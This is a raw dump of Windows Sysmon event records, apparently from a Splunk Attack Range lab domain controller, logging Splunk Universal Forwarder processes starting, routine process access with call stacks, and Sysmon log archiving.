0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x80000000000000008989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.626{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B16D549515CF7BB7ABE9DF30BB73127A,SHA256=93EAF4EE09B0484A819615976CB7D096829C85732606B466CB7B7D5242D931FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.049{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6533-6064-1D01-00000000AE01}6452C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.049{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:03.049{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.049{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:03.049{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.049{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6533-6064-1D01-00000000AE01}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.049{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6533-6064-1D01-00000000AE01}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.050{266CAFBE-6533-6064-1D01-00000000AE01}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.812{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6534-6064-1F01-00000000AE01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000009006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.812{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.812{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:04.812{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.812{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.812{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6534-6064-1F01-00000000AE01}5604C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.812{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6534-6064-1F01-00000000AE01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.813{266CAFBE-6534-6064-1F01-00000000AE01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000008999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.656{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECC3C922BF75973D923ED6EB1108F1A3,SHA256=392E1C5E8159919B8C81FF3B27FCA21390695ECE2A31D6753A1F8283E70F606A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.157{266CAFBE-6534-6064-1E01-00000000AE01}67084864C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.000{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6534-6064-1E01-00000000AE01}6708C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:04.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:04.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.000{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6534-6064-1E01-00000000AE01}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.000{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6534-6064-1E01-00000000AE01}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.001{266CAFBE-6534-6064-1E01-00000000AE01}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:05.670{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22A04CD1797E4E0CAA371BA664B736E8,SHA256=CBCB1632B9882066151C8ACAB5E8367CE74DA3A2C497AC4A4E997B650BBC5394,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000009018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.684{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0406733BF3F5F569A2183C0496CC361B,SHA256=D4B62C29C9C975D6F20330C281B1F4B3F2EF069A1F16527787C78849B69C5D55,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.591{266CAFBE-6536-6064-2001-00000000AE01}44486804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 